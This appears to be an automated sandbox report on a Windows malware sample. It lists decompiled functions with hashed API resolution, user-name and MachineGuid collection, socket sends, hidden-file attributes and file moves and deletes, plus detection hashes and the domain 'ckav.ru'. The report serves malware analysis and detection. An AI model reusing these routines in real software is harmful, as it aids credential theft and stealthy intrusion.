					E004058D4( *0x49fde0, _v20);
					E004058D4( *0x49fde0, _v16);
					E004058D4( *0x49fde0, _v12);
					E00405872( *0x49fde0, E00413D97(0), 1, 0);
					_t68 = _t73 + 0x48;
				}
				_t80 =  *0x49fde4;
				if( *0x49fde4 == 0) {
					_t10 =  *0x49fde0;
					goto L16;
				}
				return E00405695(_t53,  *0x49fde0);
			}






























                                          0x00412d31
                                          0x00412d34
                                          0x00412d39
                                          0x00412d3c
                                          0x00412d49
                                          0x00412d50
                                          0x00412d52
                                          0x00412f24
                                          0x00412f24
                                          0x00412f2b
                                          0x00412f30
                                          0x00412f32
                                          0x00412f37
                                          0x00412f41
                                          0x00412f53
                                          0x00412f53
                                          0x00412f5b
                                          0x00412f60
                                          0x00412d58
                                          0x00412d58
                                          0x00412d63
                                          0x00412d6c
                                          0x00412d73
                                          0x00412d7e
                                          0x00412d7f
                                          0x00412d80
                                          0x00412d81
                                          0x00412d82
                                          0x00412d8f
                                          0x00412da1
                                          0x00412da6
                                          0x00412dae
                                          0x00412db0
                                          0x00412db1
                                          0x00412db5
                                          0x00412dce
                                          0x00412dcf
                                          0x00412dd5
                                          0x00412dda
                                          0x00412db7
                                          0x00412db7
                                          0x00412db8
                                          0x00412dbe
                                          0x00412dc4
                                          0x00412dc9
                                          0x00412dc9
                                          0x00412de2
                                          0x00412de4
                                          0x00412de5
                                          0x00412de7
                                          0x00412de9
                                          0x00412e02
                                          0x00412e03
                                          0x00412e09
                                          0x00412e0e
                                          0x00412deb
                                          0x00412deb
                                          0x00412dec
                                          0x00412df2
                                          0x00412df8
                                          0x00412dfd
                                          0x00412dfd
                                          0x00412e11
                                          0x00412e17
                                          0x00412e19
                                          0x00412e1a
                                          0x00412e1e
                                          0x00412e37
                                          0x00412e38
                                          0x00412e3e
                                          0x00412e43
                                          0x00412e20
                                          0x00412e20
                                          0x00412e21
                                          0x00412e27
                                          0x00412e2d
                                          0x00412e32
                                          0x00412e32
                                          0x00412e4b
                                          0x00412e4d
                                          0x00412e4f
                                          0x00412e7e
                                          0x00412e8a
                                          0x00412e8f
                                          0x00412e51
                                          0x00412e59
                                          0x00412e67
                                          0x00412e6d
                                          0x00412e72
                                          0x00412e72
                                          0x00412e9e
                                          0x00412eaf
                                          0x00412eb4
                                          0x00412ec0
                                          0x00412ece
                                          0x00412edc
                                          0x00412eea
                                          0x00412ef8
                                          0x00412f0f
                                          0x00412f14
                                          0x00412f14
                                          0x00412f17
                                          0x00412f1d
                                          0x00412f1f
                                          0x00000000
                                          0x00412f1f
                                          0x00412f74

                                          APIs
                                          • CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53
                                            • Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F
                                            • Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
                                            • Part of subcall function 00402BAB: HeapFree.KERNEL32(00000000), ref: 00402BC0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$CreateFreeProcessThread_wmemset
                                          • String ID: ckav.ru
                                          • API String ID: 2915393847-2696028687
                                          • Opcode ID: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
                                          • Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
                                          • Opcode Fuzzy Hash: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
                                          • Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040632F, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0040632F() {
				char _v8;
				void* _t4;
				void* _t7;
				void* _t16;

				_t16 = E00402B7C(0x208);
				if(_t16 == 0) {
					L4:
					_t4 = 0;
				} else {
					E0040338C(_t16, 0, 0x104);
					_t1 =  &_v8; // 0x4143e8
					_v8 = 0x208;
					_t7 = E00406069(_t16, _t1); // executed
					if(_t7 == 0) {
						E00402BAB(_t16);
						goto L4;
					} else {
						_t4 = _t16;
					}
				}
				return _t4;
			}







                                          0x00406340
                                          0x00406345
                                          0x00406373
                                          0x00406373
                                          0x00406347
                                          0x0040634f
                                          0x00406354
                                          0x00406357
                                          0x0040635c
                                          0x00406366
                                          0x0040636d
                                          0x00000000
                                          0x00406368
                                          0x00406368
                                          0x00406368
                                          0x00406366
                                          0x0040637a

                                          APIs
                                            • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                            • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                          • _wmemset.LIBCMT ref: 0040634F
                                            • Part of subcall function 00406069: GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocateNameProcessUser_wmemset
                                          • String ID: CA
                                          • API String ID: 2078537776-1052703068
                                          • Opcode ID: 4afda30c811b228529c54d72888b6e374887d4959eaca369bf1b72bc4a37c641
                                          • Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
                                          • Opcode Fuzzy Hash: 4afda30c811b228529c54d72888b6e374887d4959eaca369bf1b72bc4a37c641
                                          • Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00406086, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00406086(void* _a4, union _TOKEN_INFORMATION_CLASS _a8, void* _a12, long _a16, DWORD* _a20) {
				int _t7;
				void* _t8;

				E004031E5(_t8, 9, 0xecae3497, 0, 0);
				_t7 = GetTokenInformation(_a4, _a8, _a12, _a16, _a20); // executed
				return _t7;
			}





                                          0x00406094
                                          0x004060a8
                                          0x004060ab

                                          APIs
                                          • GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: InformationToken
                                          • String ID: IDA
                                          • API String ID: 4114910276-365204570
                                          • Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                                          • Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
                                          • Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                                          • Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00402C03, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13libraryloaderCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00402C03(struct HINSTANCE__* _a4, char _a8) {
				_Unknown_base(*)()* _t5;
				void* _t6;

				E004031E5(_t6, 0, 0xceb18abc, 0, 0);
				_t1 =  &_a8; // 0x403173
				_t5 = GetProcAddress(_a4,  *_t1); // executed
				return _t5;
			}





                                          0x00402c10
                                          0x00402c15
                                          0x00402c1b
                                          0x00402c1e

                                          APIs
                                          • GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: AddressProc
                                          • String ID: s1@
                                          • API String ID: 190572456-427247929
                                          • Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                                          • Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
                                          • Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                                          • Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00404A52, Relevance: 3.1, APIs: 2, Instructions: 63registryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 93%
                                          			E00404A52(void* _a4, char* _a8, char* _a12) {
				void* _v8;
				int _v12;
				void* __ebx;
				char* _t9;
				char* _t10;
				long _t13;
				char* _t27;

				_push(_t21);
				_t9 = E00402B7C(0x208); // executed
				_t27 = _t9;
				if(_t27 == 0) {
					L4:
					_t10 = 0;
				} else {
					E00402B4E(_t27, 0, 0x208);
					_v12 = 0x208;
					E004031E5(0, 9, 0xf4b4acdc, 0, 0);
					_t13 = RegOpenKeyExA(_a4, _a8, 0, 0x20119,  &_v8); // executed
					if(_t13 != 0) {
						E00402BAB(_t27);
						goto L4;
					} else {
						E004031E5(0, 9, 0xfe9f661a, 0, 0);
						RegQueryValueExA(_v8, _a12, 0, 0, _t27,  &_v12); // executed
						E00404A39(_v8); // executed
						_t10 = _t27;
					}
				}
				return _t10;
			}










                                          0x00404a56
                                          0x00404a60
                                          0x00404a65
                                          0x00404a6a
                                          0x00404ad1
                                          0x00404ad1
                                          0x00404a6c
                                          0x00404a71
                                          0x00404a79
                                          0x00404a85
                                          0x00404a9a
                                          0x00404a9e
                                          0x00404acb
                                          0x00000000
                                          0x00404aa0
                                          0x00404aac
                                          0x00404abc
                                          0x00404ac1
                                          0x00404ac6
                                          0x00404ac6
                                          0x00404a9e
                                          0x00404ad9

                                          APIs
                                            • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                            • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                          • RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
                                          • RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocateOpenProcessQueryValue
                                          • String ID:
                                          • API String ID: 1425999871-0
                                          • Opcode ID: bcb9612233ffeb4634d4995e45ab0b963c80d9ccd10657b8c49858d8039cb957
                                          • Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
                                          • Opcode Fuzzy Hash: bcb9612233ffeb4634d4995e45ab0b963c80d9ccd10657b8c49858d8039cb957
                                          • Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004060BD, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 40%
                                          			E004060BD(void* __eflags) {
				signed int _v8;
				char _v12;
				short _v16;
				char _v20;
				void* __ebx;
				intOrPtr* _t12;
				signed int _t13;
				intOrPtr* _t14;
				signed int _t15;
				void* _t24;

				_v16 = 0x500;
				_v20 = 0;
				_t12 = E004031E5(0, 9, 0xf3a0c470, 0, 0);
				_t13 =  *_t12( &_v20, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v12);
				_v8 = _t13;
				if(_t13 != 0) {
					_t14 = E004031E5(0, 9, 0xe3b938df, 0, 0);
					_t15 =  *_t14(0, _v12,  &_v8, _t24); // executed
					asm("sbb eax, eax");
					_v8 = _v8 &  ~_t15;
					E0040604F(_v12);
					return _v8;
				}
				return _t13;
			}













                                          0x004060c6
                                          0x004060d5
                                          0x004060d8
                                          0x004060f4
                                          0x004060f6
                                          0x004060fb
                                          0x0040610a
                                          0x00406115
                                          0x0040611c
                                          0x0040611e
                                          0x00406121
                                          0x00000000
                                          0x0040612a
                                          0x0040612f

                                          APIs
                                          • CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: CheckMembershipToken
                                          • String ID:
                                          • API String ID: 1351025785-0
                                          • Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                                          • Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
                                          • Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                                          • Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00403C62, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00403C62(void* __ebx, void* __eflags, WCHAR* _a4) {
				void* _t3;
				int _t5;

				_t3 = E00403D4D(__eflags, _a4); // executed
				if(_t3 == 0) {
					__eflags = 0;
					E004031E5(__ebx, 0, 0xc8f0a74d, 0, 0);
					_t5 = CreateDirectoryW(_a4, 0); // executed
					return _t5;
				} else {
					return 1;
				}
			}





                                          0x00403c68
                                          0x00403c70
                                          0x00403c78
                                          0x00403c82
                                          0x00403c8b
                                          0x00403c8f
                                          0x00403c72
                                          0x00403c76
                                          0x00403c76

                                          APIs
                                          • CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: CreateDirectory
                                          • String ID:
                                          • API String ID: 4241100979-0
                                          • Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                                          • Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
                                          • Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                                          • Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040642C, Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 37%
                                          			E0040642C(void* __eflags) {
				short _v40;
				intOrPtr* _t6;
				void* _t10;

				_t6 = E004031E5(_t10, 0, 0xe9af4586, 0, 0);
				 *_t6( &_v40); // executed
				return 0 | _v40 == 0x00000009;
			}






                                          0x0040643c
                                          0x00406445
                                          0x00406454

                                          APIs
                                          • GetNativeSystemInfo.KERNELBASE(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: InfoNativeSystem
                                          • String ID:
                                          • API String ID: 1721193555-0
                                          • Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                                          • Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
                                          • Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                                          • Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00404EEA, Relevance: 1.5, APIs: 1, Instructions: 16networkCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 37%
                                          			E00404EEA(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _t5;

				_t5 = _a12;
				if(_t5 == 0) {
					_t5 = E00405D0B(_a8) + 1;
				}
				__imp__#19(_a4, _a8, _t5, 0); // executed
				return _t5;
			}




                                          0x00404eed
                                          0x00404ef2
                                          0x00404efd
                                          0x00404efd
                                          0x00404f07
                                          0x00404f0e

                                          APIs
                                          • send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: send
                                          • String ID:
                                          • API String ID: 2809346765-0
                                          • Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                                          • Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
                                          • Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                                          • Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00403BD0, Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00403BD0(WCHAR* _a4, WCHAR* _a8, long _a12) {
				int _t6;
				void* _t7;

				E004031E5(_t7, 0, 0xc9143177, 0, 0);
				_t6 = MoveFileExW(_a4, _a8, _a12); // executed
				return _t6;
			}





                                          0x00403bdd
                                          0x00403beb
                                          0x00403bee

                                          APIs
                                          • MoveFileExW.KERNELBASE(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: FileMove
                                          • String ID:
                                          • API String ID: 3562171763-0
                                          • Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                                          • Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
                                          • Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                                          • Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00404DF3, Relevance: 1.5, APIs: 1, Instructions: 13networkCOMMON
                                          Download Yara Rule
                                          APIs
                                          • WSAStartup.WS2_32(00000202,?), ref: 00404E08
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: Startup
                                          • String ID:
                                          • API String ID: 724789610-0
                                          • Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                                          • Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
                                          • Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                                          • Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040427D, Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0040427D(WCHAR* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xcac5886e, 0, 0);
				_t4 = SetFileAttributesW(_a4, 0x2006); // executed
				return _t4;
			}





                                          0x0040428a
                                          0x00404297
                                          0x0040429a

                                          APIs
                                          • SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: AttributesFile
                                          • String ID:
                                          • API String ID: 3188754299-0
                                          • Opcode ID: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                                          • Instruction ID: e837d3b0865cda380a04769d40cc561620ee701a25bf2a33446201ee5459e2a9
                                          • Opcode Fuzzy Hash: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                                          • Instruction Fuzzy Hash: A9C092B054430C3EFA102EF29D4AD3B3A8EEB41648B008435BE08E9096E977DE2061A8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00404A19, Relevance: 1.5, APIs: 1, Instructions: 13registryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00404A19(void* _a4, short* _a8, void** _a12) {
				long _t5;
				void* _t6;

				E004031E5(_t6, 9, 0xdb552da5, 0, 0);
				_t5 = RegOpenKeyW(_a4, _a8, _a12); // executed
				return _t5;
			}





                                          0x00404a27
                                          0x00404a35
                                          0x00404a38

                                          APIs
                                          • RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: Open
                                          • String ID:
                                          • API String ID: 71445658-0
                                          • Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                                          • Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
                                          • Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                                          • Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00403C40, Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00403C40(void* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xfbce7a42, 0, 0);
				_t4 = FindCloseChangeNotification(_a4); // executed
				return _t4;
			}





                                          0x00403c4d
                                          0x00403c55
                                          0x00403c58

                                          APIs
                                          • FindCloseChangeNotification.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: ChangeCloseFindNotification
                                          • String ID:
                                          • API String ID: 2591292051-0
                                          • Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                                          • Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
                                          • Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                                          • Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00403C08, Relevance: 1.5, APIs: 1, Instructions: 12fileCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00403C08(WCHAR* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xdeaa357b, 0, 0);
				_t4 = DeleteFileW(_a4); // executed
				return _t4;
			}





                                          0x00403c15
                                          0x00403c1d
                                          0x00403c20

                                          APIs
                                          • DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: DeleteFile
                                          • String ID:
                                          • API String ID: 4033686569-0
                                          • Opcode ID: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                                          • Instruction ID: 5639c68ad781144a2d68ff400f656d3d2c658e81fc8059c2e96e04b5885f7932
                                          • Opcode Fuzzy Hash: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                                          • Instruction Fuzzy Hash: EDB092B04082093EAA013EF59C05C3B3E4DDA4010870048257D08E6111EA36DF1010A8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00402C1F, Relevance: 1.5, APIs: 1, Instructions: 12libraryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00402C1F(WCHAR* _a4) {
				struct HINSTANCE__* _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xe811e8d4, 0, 0);
				_t4 = LoadLibraryW(_a4); // executed
				return _t4;
			}





                                          0x00402c2c
                                          0x00402c34
                                          0x00402c37

                                          APIs
                                          • LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID:
                                          • API String ID: 1029625771-0
                                          • Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                                          • Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
                                          • Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                                          • Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00403BEF, Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00403BEF(void* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xda6ae59a, 0, 0);
				_t4 = FindClose(_a4); // executed
				return _t4;
			}





                                          0x00403bfc
                                          0x00403c04
                                          0x00403c07

                                          APIs
                                          • FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: CloseFind
                                          • String ID:
                                          • API String ID: 1863332320-0
                                          • Opcode ID: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                                          • Instruction ID: 1ebc74916e7009c76bd4f38d62a0f1d2d6d24e136e2668fcc01a71b48f24aa02
                                          • Opcode Fuzzy Hash: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                                          • Instruction Fuzzy Hash: FDB092B00442087EEE002EF1AC05C7B3F4EDA4410970044257E0CE5012E937DF1010B4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00403BB7, Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00403BB7(WCHAR* _a4) {
				long _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xc6808176, 0, 0);
				_t4 = GetFileAttributesW(_a4); // executed
				return _t4;
			}





                                          0x00403bc4
                                          0x00403bcc
                                          0x00403bcf

                                          APIs
                                          • GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
